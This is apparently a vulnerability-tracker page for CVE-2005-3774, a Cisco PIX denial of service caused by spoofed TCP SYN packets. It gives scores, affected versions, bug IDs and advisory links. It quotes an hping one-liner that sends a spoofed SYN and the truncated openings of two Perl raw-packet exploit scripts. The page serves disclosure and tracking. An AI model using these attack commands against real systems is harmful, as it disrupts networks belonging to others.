CVE-2005-3774
published 2005-11-23
Priority: P4 (29), medium, 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 18.21% (96.8th percentile)
Cisco PIX 6.3 and 7.0 allows remote attackers to cause a denial of service (blocked new connections) via spoofed TCP packets that cause the PIX to create embryonic connections that would not produce a valid connection with the end system, including (1) SYN packets with invalid checksums, which do not result in a RST; or, from an external interface, (2) one byte of "meaningless data," or (3) a TTL that is one less than needed to reach the internal destination.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | pix | — | — |
| cisco | pix | — | — |
No detection rules found.
Exploit-DB
Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service
exploitdb·2005-11-23
---
# The easy way by logic [email protected] (line 2) untested /str0ke
# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx
#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);
######################## Config option ####################
my $timeout = "0
Exploit-DB
Cisco PIX - TCP SYN Packet Denial of Service
exploitdb·2005-11-22
---
source: https://www.securityfocus.com/bid/15525/info
Cisco PIX is susceptible to a remote denial-of-service vulnerability when handling certain TCP SYN packets.
This issue allows attackers to temporarily block network traffic to arbitrarily targeted TCP services. By repeating the attack, a prolonged denial-of-service condition is possible.
This issue is tracked by the following Cisco Bug IDs:
- CSCsc14915: PIX 6.3 Spoofed TCP SYN packets can block legitimate TCP connections
- CSCsc16014: PIX 7.0 Spoofed TCP SYN packets can block legitimate TCP connections
#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not instal
No writeups or analysis indexed.
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038971.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.html
- http://secunia.com/advisories/17670
- http://securitytracker.com/id?1015256
- http://www.cisco.com/en/US/products/hw/vpndevc/ps2030/products_security_notice09186a0080624a37.html
- http://www.cisco.com/warp/public/707/cisco-response-20051122-pix.shtml
- http://www.kb.cert.org/vuls/id/853540
- http://www.osvdb.org/24140
- http://www.securityfocus.com/archive/1/417458/30/0/threaded
- http://www.securityfocus.com/archive/1/426989/100/0/threaded
- http://www.securityfocus.com/archive/1/426991/100/0/threaded
- http://www.securityfocus.com/archive/1/427041/100/0/threaded
- http://www.securityfocus.com/bid/15525
- http://www.vupen.com/english/advisories/2005/2546
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25077
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25079
2005-11-23
Published